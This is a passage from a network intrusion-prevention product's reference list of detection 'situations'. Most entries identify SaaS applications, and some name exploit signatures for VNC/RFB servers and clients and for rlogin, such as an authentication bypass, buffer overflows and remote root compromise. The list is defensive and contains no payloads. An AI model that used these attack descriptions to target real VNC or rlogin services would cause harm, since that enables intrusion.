Tags: SMC
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Description: An SMC Component has consumed a high quantity of system resources and is back to a safe level.
Back to top

Resources consumption on Log Server is safe.

About this situation: Heavy resources consumption back to a safe level on Log Server
Context: Log Server situations
Severity: 6
Tags: SMC
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Description: Log Server has consumed a high quantity of system resources and is back to a safe level.
Back to top

Resources consumption on Management Server is safe.

About this situation: Heavy resources consumption back to a safe level on Management Server
Context: Management Server situation
Severity: 6
Tags: SMC
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Description: Management Server has consumed a high quantity of system resources and is back to a safe level.
Back to top

Restaurants and Dining

About this situation: Sites that list, review, advertise or promote food, dining or catering services.
Context: URL Application Context
Severity: 1
Tags: Society and Lifestyles, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that list, review, advertise or promote food, dining or catering services.
Back to top

ResumeWare

About this situation: Application ResumeWare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ResumeWare solution provides Applicant Tracking System
Back to top

Retail-Solutions

About this situation: Application Retail-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Retail Solutions provides software-as-a-service products for data management, reporting and business intelligence, and point of sale applications.
Back to top

Retailpoint

About this situation: Application Retailpoint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Retailpoint - cloud based point of sale program and retail management software.
Back to top

ReTargeter

About this situation: Application ReTargeter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ReTargeter - full-service display advertising solution, specializing in retargeting and audience targeting, allow you to reach the right audience all over the web.
Back to top

Retention-Factory

About this situation: Application Retention-Factory detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Retention Factory offers targeted e-mail marketing solutions. It helps e-commerce retailers keep in touch with existing customers, automatically, with pre-configured e-mail templates.
Back to top

Retirement-Plan-Consultants

About this situation: Application Retirement-Plan-Consultants detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Retirement Plan Consultants provides solutions for retirement planning.
Back to top

ReturnPath

About this situation: Application ReturnPath detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Inbox placement solutions from Return Path can help improve email deliverability and increase your email marketing ROI
Back to top

Reval

About this situation: Application Reval detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Reval is global Software-as-a-Service
Back to top

Revation

About this situation: Application Revation detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Revation delivers secure and compliant messaging, chat, HD voice, HD video, and screen sharing in a cloud-based unified communications platform.
Back to top

RevenueWire

About this situation: Application RevenueWire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RevenueWire is an ecommerce platform for small and medium sized companies, with a focus on digital products for optimizing phases of the transaction lifecycle through the ecommerce platform and its performance marketing channels.
Back to top

ReverbNation

About this situation: Application ReverbNation detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ReverbNation connects artists to the music Industry. It provides connections, audience exposure and promotional tools necessary to advance careers in digital music ecosystem.
Back to top

Revert

About this situation: Application Revert detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Revert keeps a searchable daily backup of the cloud-based applications you rely on. Protect your cloud data from accidental deletion, malicious users and hackers.
Back to top

ReviewPad

About this situation: Application ReviewPad detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ReviewPad is online solution that allows its users to manage the design collaboration process, all the way from collecting feedback on design comps to managing feedback and the final signoff.
Back to top

Reviewsnap

About this situation: ReviewSnap usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Reviewsnap is a market leading cloud-based performance management software for performance appraisals, 360 degree feedback, learning, and compensation. ReviewSnap mobile app supports ios, android, blackberry and windows phone.
Back to top

Revinate

About this situation: Application Revinate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Revinate is online reputation management, social media monitoring and guest satisfaction surveys solution for hotels and restaurants
Back to top

Revionics

About this situation: Application Revionics detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Revionics provides End-to-End Merchandise Optimization solutions for 40,000 global retail locations across 18M products with 2.2B sku
Back to top

Revolutionehr

About this situation: Application Revolutionehr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RevolutionEHR is the provider of cloud-based practice management and electronic health record systems for the optometric community.
Back to top

Revulytics

About this situation: Application Revulytics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Revulytics offers cloud-based software usage analytics and turnkey services that give software producers deep visibility into how their products are being used and misused, providing them with actionable intelligence to generate revenue by converting unlicensed users into paying customers, optimize product development, and make data-driven decisions across their business.
Back to top

RevX-Advanced-Billing-and-Customer-Care

About this situation: Application RevX-Advanced-Billing-and-Customer-Care detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RevX provides subscription and usage-based charging and billing, customer care, and integration technologies for enterprise and service provider customers.
Back to top

Rezdy

About this situation: Application Rezdy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rezdy is an Online Reservation System for Tours, Activities, Adventures, Sightseeing, Sports and Attractions.
Back to top

Rezgo

About this situation: Application Rezgo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rezgo is a cloud based software as a service (SaaS) booking and reservation system designed for tour and activity suppliers who are looking to increase their revenues and decrease their administrative costs.
Back to top

RFB-Client-Bad-Handshake-Message-Sequence

About this situation: RFB client violates the RFB handshake message sequence
Context: RFB without parameters
Severity: 8
Tags: Potential Compromise
First detected in: sgpkg-ips-148-2032
Last changed: sgpkg-ips-157-2032
Vulnerability: RealVNC-Authentication-Bypass
Description: The RFB client has violated the RFB protocol handshake message order order. In practise, this situation means that the client sent the ProtocolVersion or Security message before the server. This behaviour is a known characteristic of an attack against the RFB protocol. Risk analysis: Attempted attack.
Back to top

RFB-Client-Bad-Security-Option

About this situation: RFB client chose no authentication even though the server requested authentication
Context: RFB without parameters
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-148-2032
Last changed: sgpkg-ips-225-3038
Vulnerability: RealVNC-Authentication-Bypass
Description: The RFB client requested using no authentication even though the server requires authentication. This behaviour is a known attack against the RFB protocol. Risk analysis: Attempted attack.
Back to top

RFB-Client-Bad-Version

About this situation: The RFB client chose a higher version number than the server supports
Context: RFB without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-148-2032
Last changed: sgpkg-ips-157-2032
Description: The RFB client violated the RFB protocol by choosing larger version number than the server supports. The server should close the connection if this behaviour occurs. Risk analysis: Risk level is medium.
Back to top

RFB-Client-Unknown-Version

About this situation: The RFB client uses an unknown protocol version
Context: RFB without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-148-2032
Last changed: sgpkg-ips-157-2032
Description: The RFB client uses an unknown protocol version. Risk analysis: Risk level is medium. The server uses a protocol version that is unknown to this product.
Back to top

RFB-Server-Unknown-Version

About this situation: The RFB server uses an unknown protocol version
Context: RFB without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-148-2032
Last changed: sgpkg-ips-157-2032
Description: The RFB server uses an unknown protocol version. Risk analysis: Risk level is medium. The server uses a protocol version that is unknown to this product.
Back to top

RFB_CS-Libvncserver-Rfbprocessclientnormalmessage-Divide-By-Zero-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in LibVNCServer Development Team LibVNCServer detected
Context: RFB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LibVNCServer, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-613-5211
Vulnerability: Libvncserver-Rfbprocessclientnormalmessage-Divide-By-Zero-Denial-Of-Service
Description:
Back to top

RFB_CS-Qemu-VNC-Set_Pixel_Format-Bits_Per_Pixel-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in QEMU QEMU detected
Context: RFB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, QEMU, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic, 2nd Most Recent Update, 3rd Most Recent Update, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1872-5242
Vulnerability: Qemu-VNC-Set_Pixel_Format-Bits_Per_Pixel-Null-Pointer-Dereference
Description:
Back to top

RFB_CS-RealVNC-Server-ClientCutText-Message-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in RealVNC server detected
Context: RFB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RealVNC, Any Operating System not specific, RealVNC not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-304-4219
Last changed: sgpkg-ips-586-5211
Vulnerability: RealVNC-Server-ClientCutText-Message-Memory-Corruption
Description:
Back to top

RFB_CS-Suspicious-Request

About this situation: An attempt to exploit a vulnerability in VNC detected
Context: RFB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-570-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

RFB_CS-TurboVNC-Fence-Message-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in TurboVNC detected
Context: RFB Client Stream
Severity: 7
Tags: Linux, Any Hardware, TurboVNC, CVE2019, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1203-5242
Last changed: sgpkg-ips-1203-5242
Vulnerability: TurboVNC-Fence-Message-Stack-Based-Buffer-Overflow
Description:
Back to top

RFB_SS-Libvnc-LibVNCClient-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in libVNC LibVNCClient detected
Context: RFB Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LibVNCClient, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1141-5242
Vulnerability: Libvnc-LibVNCClient-Heap-Based-Buffer-Overflow
Description:
Back to top

RFB_SS-Libvncserver-LibVNCClient-Framebufferupdate-Rectangle-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in LibVNCServer Development Team LibVNCServer detected
Context: RFB Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LibVNCServer, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-842-5242
Last changed: sgpkg-ips-842-5242
Vulnerability: Libvncserver-LibvVNCClient-Framebufferupdate-Rectangle-Heap-Buffer-Overflow
Description:
Back to top

RFB_SS-Suspicious-Server-Response

About this situation: An attempt to exploit a vulnerability in VNC detected
Context: RFB Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-672-5211
Last changed: sgpkg-ips-672-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

RFB_SS-Tightvnc-Vncviewer-HandleCoRREBPP-Global-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in TightVNC vncviewer detected
Context: RFB Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, TightVNC, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1212-5242
Last changed: sgpkg-ips-1212-5242
Vulnerability: Tightvnc-Vncviewer-HandleCoRREBPP-Global-Buffer-Overflow
Description:
Back to top

RFB_SS-Tightvnc-Vncviewer-Rfbservercuttext-Handler-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in TightVNC detected
Context: RFB Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, TightVNC, CVE2019, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1205-5242
Last changed: sgpkg-ips-1210-5242
Vulnerability: Tightvnc-Vncviewer-Rfbservercuttext-Handler-Integer-Overflow
Description:
Back to top

RFB_SS-UltraVNC-Authenticate-Buffer-Overflow

About this situation: An attempt to exploit buffer overflow vulnerability in UltraVNC detected
Context: RFB Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, UltraVNC, CVE2009, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-206-2032
Last changed: sgpkg-ips-206-2032
Vulnerability: UltraVNC-Authenticate-Buffer-Overflow
Description:
Back to top

Rhapsody

About this situation: Rhapsody usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This service offers unlimited access to a large library of digital music for a flat monthly fee. Source:Wikipedia
Back to top

RIA-Match

About this situation: Application RIA-Match detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RIA Match supports financial advisors. Buy, sell, merge, join, partner, add advisors to your practice.
Back to top

Rib-software

About this situation: Application Rib-software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RIB Software provide project management software solutions for Construction and Process Industry, Infrastructure, Public Sector and Manufacturing.
Back to top

Ribose

About this situation: Application Ribose detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ribose is a collaboration platform that provides tools and connections needed to simultaneously plan activities.
Back to top

RicohDocs

About this situation: Application RicohDocs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RicohDocs - Document Management System (DMS) is complete suite of features to help manage your documents in organized way.
Back to top

Riemurasia

About this situation: Riemurasia usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-769-5211
Description: Riemurasia is an online media sharing service.
Back to top

Riff File

About this situation: RIFF-based file format detected
Context: File Stream Redirection
Severity: 2
Tags: File Type Identification, Content Identification, Media File, RIFF Container
First detected in: sgpkg-ips-486-5211
Last changed: sgpkg-ips-486-5211
Description:
Back to top

Right-Click

About this situation: Application Right-Click detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Right Click Software provides integrated Assisted Living software that is affordable and easy to use. Our software gives users actionable information that enhances the quality of resident care and services. Our software enables businesses to increase revenue, decrease costs, and improve their bottom line.
Back to top

Right90

About this situation: Application Right90 detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Right90 makes on-demand software that delivers a trusted sales forecast companies can confidently act on. Using patented technology, Right90 makes it easy to capture and consolidate sales forecasts while delivering actionable information that companies can rely on.
Back to top

RightNow-Media

About this situation: Application RightNow-Media detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RightNow is a provider of video resources, streaming online platform and conferences for churches.
Back to top

Rightscale

About this situation: RightScale usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-654-5211
Description: RightScale is a SaaS-based cloud computing management solution for managing cloud infrastructure across multiple IaaS providers. RightScale enables organizations to easily deploy and manage applications in the cloud.
Back to top

Rightsignature

About this situation: RightSignature usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: RightSignature is an online software platform for getting digital signatures on electronic documents such as contracts.
Back to top

Ring Central

About this situation: Endpoint Context Agent based Ring Central
Context: EI Correlation
Severity: 1
Tags: Web Conferencing, Endpoint
First detected in: sgpkg-ips-1523-5242
Last changed: sgpkg-ips-1523-5242
Description: Ring Central endpoint application has been detected. Ring Central is an internet telephony application.
Back to top

RingCentral

About this situation: Application RingCentral detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RingCentral provides cloud computing-based phone systems to help businesses manage mobile, fax and email communications, delivers hosted phone systems that are designed for mobile and distributed businesses.
Back to top

Ringio

About this situation: Application Ringio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hosted PBX - Ringio provides a small business phone system with hosted PBX and CRM integration at an affordable price.
Back to top

RingLead

About this situation: Application RingLead detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RingLead offers a complete end-to-end suite of products to clean, protect and enhance company and contact information, leading to improved organizational efficiency, more reliable business intelligence, and maximized ROI on CRM and marketing automation investments.
Back to top

RioLearn

About this situation: Application RioLearn detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RioLearn is e-learning at Rio Salado College
Back to top

Riot-Games

About this situation: Riot Games usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-773-5211
Description: Riot Games is a developer of mobile, desktop and console games.
Back to top

RIPE-Atlas

About this situation: RIPE Atlas usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-1078-5242
Description: RIPE Atlas is a distributed Internet measurement platform created by Reseaux IP Europeens Network Coordination Centre, RIPE NCC. It consists of thousands of measurements devices distributed globally that can perform real-time connectivity measurements.
Back to top

RIPng

About this situation: RIPng traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-636-5211
Description: RIPng is a routing information exchange protocol designed for IPv6 networks. The protocol is defined in RFC 2080.
Back to top

Ripple-IT-Mgmt-Svc

About this situation: Application Ripple-IT-Mgmt-Svc detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ripple provides Humans First IT support, web hosting and cloud services for companies across the US.
Back to top

Riptidecloud

About this situation: Application Riptidecloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Riptide Software is a CMMI Level 4 formally assessed small business providing software solutions and services to civilian and military government agencies and commercial customers in multiple industries
Back to top

Risk-Management-Solutions

About this situation: Application Risk-Management-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Risk Management Solutions is the catastrophe modeling company. Its models and software helps insurers, financial markets, corporations, and public agencies to evaluate and manage catastrophe risks.
Back to top

riskcloud.NET

About this situation: Application riskcloud.NET detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: riskcloud.NET provides cloud based enterprise risk management software helping users manage risk.
Back to top

RiskVision

About this situation: Application RiskVision detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RiskVision develops comprehensive risk intelligence solutions for the enterprise. The highly decorated RiskVision platform is the industrys first risk intelligence solution designed for todays real-time, big data, threat-centric world.
Back to top

Riverbed

About this situation: Application Riverbed detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Riverbed is an IT company that develops products to improve application performance across WANs, a technique known as WAN Optimization.
Back to top

RJMetrics

About this situation: Application RJMetrics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RJMetrics helps online businesses make smarter decisions with their data, provide the kinds of deep insights that were formerly only accessible by large companies willing to invest in full-time data scientists.
Back to top

RJS-Software

About this situation: Application RJS-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebDocs is a complete document management solution that helps you streamline business processes and eliminate paper by digitally managing, storing and distributing all your key business content.
Back to top

RLOGIN_Froot-Remote-Compromise

About this situation: Remote root compromise via login
Context: Rlogin Client Stream
Severity: 7
Tags: Unix, Any Hardware, CVE1999, Unix not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-348-4219
Vulnerability: AIX-Rlogin-Froot
Description:
Back to top

RLOGIN_Guest-Access

About this situation: Unix rlogin guest access
Context: Rlogin Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Remote Control, TCP Client Traffic
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-348-4219
Description:
Back to top

RLOGIN_Nobody-Access

About this situation: Unix rlogin nobody access
Context: Rlogin Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Remote Control, TCP Client Traffic
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-348-4219
Description:
Back to top

RLOGIN_Root-Access

About this situation: Unix rlogin root access
Context: Rlogin Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Remote Control, TCP Client Traffic
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-348-4219
Description:
Back to top

RLOGIN_System-V-Login-Buffer-Overflow

About this situation: System V login buffer overflow attack
Context: Rlogin Client Stream
Severity: 10
Tags: Solaris, Any Hardware, Generic rlogin server, CVE2001, Solaris not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: SysV-Login-BOF
Description:
Back to top

RM-Innovation

About this situation: Application RM-Innovation detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RM Innovation provides software products for stores and online retailers.
Back to top

Roadmap

About this situation: Application Roadmap detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Roadmap's project portfolio management cloud service offers resource forecasting, project intelligence, billable rates and gantt charts. Roadmap is the most complete planning tool for Basecamp.
Back to top

ROBO-SEO-Cart

About this situation: Application ROBO-SEO-Cart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ROBO SEO Cart provides e-commerce software for web designers which helps to setup and use and maintain with an administration website for updating products, categories, webpages, settings.
Back to top

Roboform

About this situation: Application Roboform detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RoboForm is a Password Manager and Form Filler that allows One Click Logins.
Back to top

Robora

About this situation: Application Robora detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Robora is a payments company which helps users to sell.
Back to top

Robotron

About this situation: Application Robotron detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Robotron provide owner-managed software company for the development of database-based information systems. From the first idea to the process support the entire software life cycle is covered by our services.
Back to top

Rocket-Lawyer

About this situation: Application Rocket-Lawyer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rocket Lawyer helps manage all of your legal needs online, create legal documents and legal forms instantly with safe and secure storage, e-signatures and lawyer review.
Back to top

Rocket-Matter

About this situation: Application Rocket-Matter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rocket Matter provides cloud-based legal practice management and time and billing software on the web.
Back to top

Rocket.Chat

About this situation: Endpoint Context Agent based Rocket.Chat
Context: EI Correlation
Severity: 1
Tags: IM, Endpoint
First detected in: sgpkg-ips-1686-5242
Last changed: sgpkg-ips-1686-5242
Description: Rocket.Chat endpoint application has been detected. Rocket.Chat is a communications platform. This ECA application detects the native client.
Back to top

Rocketsoftware

About this situation: Application Rocketsoftware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rocket Software is a software development firm that builds enterprise products and delivers enterprise solutions in the following segments
Back to top

Rockstar-Games

About this situation: Rockstar Games usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Description: Rockstar Games usage was detected. Rockstar Games is producer of various popular games for multiple platforms, such as GTA series.
Back to top

Rockstar-Games-GTA5

About this situation: Grand Thief Auto V usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Description: Grand Thief Auto V (GTA5) usage was detected. Grand Thief Auto V is a game produced by Rockstar Games.
Back to top

Roguewave

About this situation: Application Roguewave detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rogue Wave independent provider of cross-platform software development tools and embedded components. Rogue Wave offering everything from cloud-based-services to native platform applications to portable software libraries.
Back to top

Roku

About this situation: Roku usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1720-5242
Description: Roku is an american streaming service.
